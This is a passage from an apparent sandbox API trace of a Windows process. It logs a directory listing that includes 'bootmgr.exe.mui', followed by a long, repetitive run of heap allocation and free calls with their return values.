lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.710] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.710] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.710] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0184.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0184.711] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 